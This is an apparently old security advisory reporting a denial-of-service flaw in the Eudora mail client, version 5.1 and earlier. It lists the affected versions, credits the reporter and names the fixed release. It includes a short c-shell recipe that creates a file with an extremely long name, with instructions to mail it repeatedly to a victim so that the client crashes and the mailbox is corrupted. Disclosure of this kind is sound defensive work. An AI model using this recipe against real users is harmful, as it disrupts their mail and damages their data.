|
|
| |
Eudora, developed and distributed by Qualcomm, is a Mail User Agent running on Windows 95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
A remote user can create a DoS attack by sending a file with an exceptionally long name. This does not cause an exploitable buffer overflow but crashes the program.
In addition, the mailbox will be corrupted and cause the program to crash every time.
Note this is a different issue than the one discussed here: Windows buffer overflow vulnerability |
| |
Credit:
Information was provided by David Fernandez Madrid
|
| |
Vulnerable versions:
* Eudora Versions 5.1.* and lower
Immune versions:
* Eudora Version 5.2 and higher
Exploit Code:
Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo "security" >! $a.txt
(Written in c-shell)
Then send the file two or three times as an attachment to the victim.
Solution:
Download latest version of Eudora at: Eudora Update
|
|
|
|
|
|
|
|
